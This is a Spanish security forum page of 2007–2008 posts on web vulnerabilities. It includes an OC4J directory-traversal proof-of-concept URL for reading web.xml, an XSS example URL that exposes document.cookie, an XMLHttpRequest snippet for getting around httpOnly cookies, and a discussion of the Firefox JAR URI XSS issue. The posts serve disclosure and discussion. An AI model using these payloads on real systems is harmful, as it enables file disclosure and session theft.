elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: 1 2 3 [4] 5 6
31  Seguridad Informática / Nivel Web / OC4J Directory Traversal en: 7 Septiembre 2008, 20:17 pm
Es similar a uno de Tomcat que acaba de salir  >:D
Oracle apenas hoy me creyó que era una vulnerabilidad :xD

es 0day..

El ûber PoC
Código:
http://localhost:8888/webapp/SOMETHING/%c0%ae%c0%ae/WEB-INF/web.xml

lalala

Saludos!!
32  Seguridad Informática / Nivel Web / Gran tutorial sobre inyecciones sql en MySQL en: 30 Junio 2008, 03:43 am
MOVIDO A:
http://foro.elhacker.net/nivel_web/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html
33  Seguridad Informática / WarZone / Reglas del subforo en: 3 Junio 2008, 00:26 am
Reglas muy simples:
1.- No dar respuestas.
2.- No salirse del tema.

Cualquier duda que comprometa la prueba (dar una posible respuesta por ejemplo), deberá ser tratada por privado mandando un correo a warzone@elhacker.net

Sobre cualquier otra temática, este subforo se sujeta a las reglas del foro: http://foro.elhacker.net/reglas

Saludos!!
34  Seguridad Informática / WarZone / FAQ de WarZone en: 3 Junio 2008, 00:26 am
en construccion
35  Seguridad Informática / WarZone / WarZone estara OFFLINE por unos dias debido a problemas del ISP en: 3 Junio 2008, 00:24 am
Aqui se avisará sobre fallas técnicas en warzone, y los usuarios podrían reportar errores en la web de warzone.

RFE es "Request for Enchancement" (es decir, alguna caracteristica que te gustaría ver en warzone, por ejemplo.. implementar clanes o grupos).

Aqui solo puede haber dudas sobre la web (el sistema de la web), es decir, no sobre pruebas.

Cualquier cosa que tenga que ver con una prueba, se debe hacer en el subforo correspondiente.

Saludos!!
36  Seguridad Informática / WarZone / Instrucciones para las propuestas de pruebas. en: 3 Junio 2008, 00:23 am
Cualquier persona puede proponer una prueba.

Para proponer una prueba, se debe mandar un correo a warzone@elhacker.net con la descripción de esta, toda la documentación posible, y de ser posible, el código fuente de dicha prueba.

Por cuestiones de seguridad, solo aceptamos crackmes si se nos da el código fuente.

En caso de que solo sea una idea, si es buena, mándala.

Las mejores pruebas, serán implementadas y agregadas a warzone, y se les dará los créditos correspondientes a los usuarios que nos hayan apoyado.

Saludos!!
37  Seguridad Informática / Nivel Web / Recopilatorio de Vulnerabilidades de XSS/SQLinjection en: 26 Mayo 2008, 03:50 am
Post para reportar de forma pública una vulnerabilidad de XSS o SQLinjection en un sitio web que no use software distribuido (es decir, que su código no sea accesible).

En caso de que sea software distribuido se puede crear un nuevo tema describiendo la vulnerabilidad.

Solo se permite la publicación de esta información en este tema, y no se puede crear un tema individual reportando este tipo de vulnerabilidades, en caso de hacerlo este será borrado.

El formato es el siguiente (ejemplo):

Sitio web: http://www.google.com/
Descubridor: sirdarckcat
URL del aviso: http://sirdarckcat.blogspot.com/2007/10/vulns-of-google-that-where-and-are-not.html
Fecha de descubrimiento: 27 de Julio del 2007
Fecha de notificación: 27 de Julio del 2007
Fecha de publicación: 13 de Octubre del 2007
Arreglado : Si, desde el 4 de Agosto del 2007
Información adicional:
Código:
http://www.google.com/gwt/mdp/x/en/detect/1?manually=true&brand=sirdackcat&model=sirdarckcat.net%3Cscript%3Ealert(document.cookie);%3C/script%3E


Es importante notar que los siguientes campos son obligatorios:
Sitio web, URL del aviso, Descubridor, Información adicional

Sinembargo Descubridor puede quedar como Anónimo.

Información adicional deberá contener la dirección de enlace al PoC o a una captura de pantalla.

En caso de que sea un enlace este deberá estar entre etiquetas [code][/code].

Además siguiendo con la política de disclosure (ver reglas), solo se aceptarán PoCs que:
Citar
    En los foros públicos, la publicación de vulnerabilidades en sitios Web específicos, esta permitida, si y sólo si: ésta tiene un pagerank igual o superior a 4, fue publicada en otro lugar previamente, y el enlace se mantenga firme con lo estipulado en la sección II.A.2.b. En caso de que la vulnerabilidad sea de un software distribuido, se podrá describir la vulnerabilidad en el foro correspondiente. Sin embargo, en ese caso, esta prohibido colocar sitios Web vulnerables de terceros.
Es decir, URL del aviso debe ser una URL externa al foro, y es obligatoria (a menos que la vulnerabilidad ya haya sido arreglada).

Si no tienen un blog donde publicar estas vulnerabilidades, o les da flojera hacerlo, les recomiendo http://txt.io/ es rapido y sencillo. Pueden publicar exactamente lo que pusieron aqui en el foro, pero es importante que tengamos una fuente a donde enlazar el descubrimiento de la vulnerabilidad, para evitar problemas con los sitios web.

El código bbcode del formato es:

Citar
[b]Sitio web: [/b]
[b]Descubridor: [/b]
[b]URL del aviso: [/b]
[b]Fecha de descubrimiento: [/b]
[b]Fecha de notificación: [/b]
[b]Fecha de publicación: [/b]
[b]Arreglado: [/b]
[b]Información adicional: [/b]
[code][/code]

Fuera de esto, comentarios sobre las vulnerabilidades aqui comentadas deberán estar en otro post.

Esto se deberá hacer "citando" el mensaje en cuestión en un tema nuevo.

Si el comentario es de pertinencia solo al autor del mensaje, este se deberá mandar por MP, y no en un tema nuevo, de lo contrario será borrado sin aviso.

Es todo! Gracias :)

Saludos!!
38  Media / Diseño Gráfico / (México) Concurso de diseño -externo- en: 7 Diciembre 2007, 08:02 am
Bueno, normalmente no les pondría estas cosas aqui, pero dado que a algunos de ustedes les podría interesar, y nunca vienen mal 500 pesos de mas, les dejo las convocatoria.

Citar
Concurso de diseño: Logotipo Comercialmente.com.mx
Premio en efectivo: $500.00 (Pesos Mexicanos)
Fecha límite: Domingo 09 de diciembre de 2007, 0:00 hrs (media noche del sábado)
Limitantes: Hasta 3 entradas por participante
Estilo: Libre
Envía tu(s.) propuestas con todos tus datos y una explicación del logotipo a:

 concurso [@ ] neonlightstudios.com

http: //www.neonlightstudios.com/concurso/concursologo.html (link-removido)

solo deben diseñar el logo, si algún usuario del foro gana, mandeme un MP y lo anuncio aqui, por lo pronto, cierro el tema..


Suerte chavos :P

//edit
no soy webmaster/admin/dueño/etc.. de esa web, cualquier cosa/pregunta/comentario al correo que les dí.
39  Seguridad Informática / Nivel Web / WW-XSS para firefox usando JAR URI.. en: 11 Noviembre 2007, 03:09 am
Este es como el tema de la semana en webappsec.

WW-XSS significa "World Wide XSS", y eso es que un XSS estaría afectando muchísimos sitoos web en internet, entre ellos esta este foro.

pdp recientemente "reveló" la existencia y posibilidades de explotación del URI "JAR:".. aqui:
http://www.gnucitizen.org/blog/web-mayhem-firefoxs-jar-protocol-issues

Poco despues beford descubrió que tiene una pequeña vulnerabilidad que permite robar el SOP en sitios que usan redirecciones:
http://blog.beford.org/?p=8

En este caso en google.. dado que una redirección NO ES una vulnerabilidad, sino una feature "peligrosa", en este caso todos los usuarios de firefox que usen servicios de google son vulnerables a XSS, aunque google no tenga ninguna vulnerabilidad.

PDP explica este tema mas aqui:
http://www.gnucitizen.org/blog/severe-xss-in-google-and-others-due-to-the-jar-protocol-issues

Esto es bastante peligroso para los usuarios de firefox.. es dificil recomendarles algo.. ya que es un XSS persistente, que no puede detectar NoScript, asi que hasta que mozilla saque algún parche, o algo, no usen firefox..

Saludos!!

--actualizacion
giorgio maone, acaba de agregar un parche para NoScript en la version 1.1.8
http://noscript.net/?ver=1.1.8
Que detiene los ataques basados en redirecciones para violar la SOP
40  Seguridad Informática / Nivel Web / Cookies httpOnly en Firefox 2.0.0.5 en: 20 Julio 2007, 06:42 am
Pues una de las novedades en Firefox 2.0.0.5 es la existencia de las cookies httpOnly.

Son algo asi:

Set-Cookie: cookie=valor; httpOnly;

y despues, es imposible accesarlas desde el atributo "cookie" en document..

Código
  1. document.cookie

Esto puede servir para evitar el robo de cookies, en ataques de XSS.

Sinembargo, poco despues de que salió, kuza55 de w4ck1ng, descubrió que en las peticiones AJAX, las cabeceras se envian de igual forma con las cookies, al hacer:

Código
  1. with(new XMLHttpRequest()){
  2. open("GET",location,false);
  3. send(null);
  4. alert(getResponseHeader("Set-Cookie"));
  5. }

En fin, esto debería cambiar en la siguiente version de Firefox, sinembargo, vale la pena mencionarlo, y puede ser explotado hasta que sea arreglado.

Saludos!!
este post quiere estar en un subforo de hacking web xD
Páginas: 1 2 3 [4] 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines